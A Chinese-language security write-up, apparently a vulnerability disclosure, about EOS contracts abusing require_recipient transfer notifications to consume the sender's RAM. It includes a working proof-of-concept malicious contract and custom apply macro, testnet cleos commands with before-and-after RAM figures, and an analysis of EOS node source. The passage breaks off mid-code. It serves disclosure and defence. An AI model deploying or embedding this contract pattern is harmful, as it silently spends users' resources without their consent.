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在美图区块链实验室公众号、慢雾区、CodeSec等媒体提出警示,“警惕 | 恶意EOS合约存在吞噬用户RAM的安全风险”。



EOS 的合约可以通过require_recipient触发调用其他合约,设计这样的机制给合约的开发者提供了很大的便利性, 但是也带了新的问题,我们在测试中发现require_recipient 有可利用的漏洞导致RAM在不知情的情况下被滥用。


我们已经给 EOS 官方提了 issue : https://github.com/EOSIO/eos/issues/4824 ,并得到官方的回应 :

Contracts delegating action processing to other contracts have a trust relationship with the other contracts. To prevent unexpected RAM consumption, the best way is to control all of the relevant accounts and contracts. A less attractive but possibly effective way is to only delegate to verified open source contracts that have been frozen by dropping ownership permissions. There have been discussions about how to provide relative certainty that you can delegate to an arbitrary contract and still be assured there will be no RAM consumption. Code has not yet been written and there is no schedule. Watch future release notes.




在DAPP 的开发过程中, 为了获取转账信息, 一种方法是采用require_recipient来订阅转账通知, 原理是这样的:

在系统合约eosio.token 的transfer 中, 转账时会分别通知from 和 to;

如果账户to 本身是个合约账户, 并且也实现了相同的transfer 方法, 则这个to合约的transfer方法会被调用。

void token::transfer( account_name from, account_name to, asset quantity, string memo ) { eosio_assert( from != to, "cannot transfer to self" ); require_auth( from ); eosio_assert( is_account( to ), "to account does not exist"); auto sym = quantity.symbol.name(); stats statstable( _self, sym ); const auto& st = statstable.get( sym ); require_recipient( from ); require_recipient( to ); eosio_assert( quantity.is_valid(), "invalid quantity" ); eosio_assert( quantity.amount > 0, "must transfer positive quantity" ); eosio_assert( quantity.symbol == st.supply.symbol, "symbol precision mismatch" ); eosio_assert( memo.size() <= 256, "memo has more than 256 bytes" ); sub_balance( from, quantity ); add_balance( to, quantity, from ); }

在自己的合约实现相同的transfer 方法:

void komo::transfer(account_name from, account_name to, asset quantity, std::string memo) { if (from == _self || to != _self) { return; } for (int i = 0; i < 100; i++) { // use from as payer!! _teams.emplace(from, [&](auto &t) { t.id = _teams.available_primary_key(); t.name = from; t.total = quantity; t.big_dummy_str = std::string("wwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww"); }); } return; } apply中允许eosio.token::transfer 触发调用。 #define EOSIO_ABI_EX( TYPE, MEMBERS ) \ extern "C" { \ void apply( uint64_t receiver, uint64_t code, uint64_t action ) { \ auto self = receiver; \ if( action == N(onerror)) { \ /* onerror is only valid if it is for the "eosio" code account and authorized by "eosio"'s "active permission */ \ eosio_assert(code == N(eosio), "onerror action's are only valid from the \"eosio\" system account"); \ } \ if ((code == self || action == N(onerror)) || (code == N(eosio.token) && action == N(transfer)) ) { \ TYPE thiscontract( self ); \ switch( action ) { \ EOSIO_API( TYPE, MEMBERS ) \ } \ /* does not allow destructor of thiscontract to run: eosio_exit(0); */ \ } \ } \ } \ EOSIO_ABI_EX(komo, (transfer))

这个流程看似没什么问题,但是却带了安全隐患,可以恶意消耗账号from 的RAM 资源。 在上面的例子中 komo::transfer 故意用账户from 的授权写了很多无用的记录到state db, 而这个操作用户在授权eosio::transfer时是不知情的。


在测试网络中分别创建3个账号, test11111111, test22222222, komo11111111(合约账户, 部署了上面的合约komo)

测试之前查看 test11111111 RAM 资源

$ ./x_cleos.sh get account test11111111 permissions: owner 1: 1 EOS61ErKWxHQF6AoSKRc5GJb2HmorQpsC6uciQq1kDiPcZVfHZAU5 active 1: 1 EOS5eiF9mFxVqYG8Mjv7A2uE4ZDFAdqDQtrvgV3yWBGsiNz8LzZ5X memory: quota: 32.6 MiB used: 107.5 KiB

给普通账户 test22222222 转账

./x_cleos.sh transfer -c eosio.token test11111111 test22222222 "1.0000 EOS"

再次查看test11111111 RAM资源

$ ./x_cleos.sh get account test11111111 permissions: owner 1: 1 EOS61ErKWxHQF6AoSKRc5GJb2HmorQpsC6uciQq1kDiPcZVfHZAU5 active 1: 1 EOS5eiF9mFxVqYG8Mjv7A2uE4ZDFAdqDQtrvgV3yWBGsiNz8LzZ5X memory: quota: 32.6 MiB use d: 107.5 KiB

没有变化, 还是107.5 KiB;再给合约账户 komo11111111 转账

./x_cleos.sh transfer -c eosio.token test11111111 komo11111111 "1.0000 EOS"

再次查看test11111111 RAM资源, 发现被消耗了(142.2-107.5)= 34.7K 字节! 原因是上面komo::transfer 中的for 循环用账户test11111111的授权写了很多数据到state db

$ ./x_cleos.sh get account test1111 1111 permissions: owner 1: 1 EOS61ErKWxHQF6AoSKRc5GJb2HmorQpsC6uciQq1kDiPcZVfHZAU5 active 1: 1 EOS5eiF9mFxVqYG8Mjv7A2uE4ZDFAdqDQtrvgV3yWBGsiNz8LzZ5X memory: quota: 32.6 MiB used: 142.2 KiB 代码分析

因为komo::transfer 这个handler 是被eosio.token::transfer 中的require_recipient 触发的, 在代码中当前action 已有账户 from 的授权。 所以检查权限时不会报错。

void apply_context::update_db_usage( const account_name& payer, int64_t delta ) { if( delta > 0 ) { if( !(privileged || payer == account_name(receiver)) ) { require_authorization( payer ); } } trx_context.add_ram_usage(payer, delta); } void apply_context::require_authorization( const account_name& account ) { for( uint32_t i=0; i < act.authorization.size(); i++ ) { if( act.authorization[i].actor == account ) { used_authorizations[i] = true; return; } } EOS_ASSERT( false, missing_auth_exception, "missing authority of ${account}", ("account",account)); }

并且我们发现, 只要维持这个数据结构占据的字节不变,这个窃取的RAM在komo合约中是可以一直使用的。

void apply_context::db_update_i64( int iterator, account_name payer, const char* buffer, size_t buffer_size ) { const key_value_object& obj = keyval_cache.get( iterator ); const auto& table_obj = keyval_cache.get_table( obj.t_id ); EOS_ASSERT( table_obj.code == receiver, table_access_violation, "db access violation" ); // require_write_lock( table_obj.scope ); const int64_t overhead = config::billable_size_v<key_value_object>; int64_t old_size = (int64_t)(obj.value.size() + overhead); int64_t new_size = (int64_t)(buffer_size + overhead); if( payer == account_name() ) payer = obj.payer; if( account_name(obj.payer) != payer ) { // refund t

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